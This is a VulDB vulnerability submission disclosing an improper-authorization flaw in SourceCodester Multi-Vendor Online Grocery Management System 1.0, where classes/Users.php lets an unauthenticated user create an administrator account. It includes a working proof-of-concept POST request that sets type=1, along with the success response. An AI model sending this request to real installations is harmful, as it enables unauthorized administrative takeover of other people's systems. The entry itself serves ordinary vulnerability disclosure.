| Titel | SourceCodester Multi-Vendor Online Grocery Management System 1.0 Improper Authorization |
|---|
| Beschreibung | A vulnerability was found in SourceCodester Multi-Vendor Online Grocery Management System 1.0. It has been classified
as critical. The file classes/Users.php is accessible without authentication and performs no session validation. The
save_users() function dynamically builds an INSERT INTO users SQL statement from POST parameters without excluding the
type column. An unauthenticated attacker can supply type=1 to create a system administrator account in a single HTTP
request.
POST /mvogms/classes/Users.php?f=save
firstname=pwned&lastname=hacker&username=attacker&password=Atk%40123&type=1
Response: 1 (success) |
|---|
| Quelle | ⚠️ https://github.com/lee945/cve/issues/1 |
|---|
| Benutzer | cHr1s (UID 98736) |
|---|
| Einreichung | 03.06.2026 13:53 (vor 1 Monat) |
|---|
| Moderieren | 04.07.2026 06:59 (1 month later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 376286 [SourceCodester Multi-Vendor Online Grocery Management System 1.0 classes/Users.php save_users erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|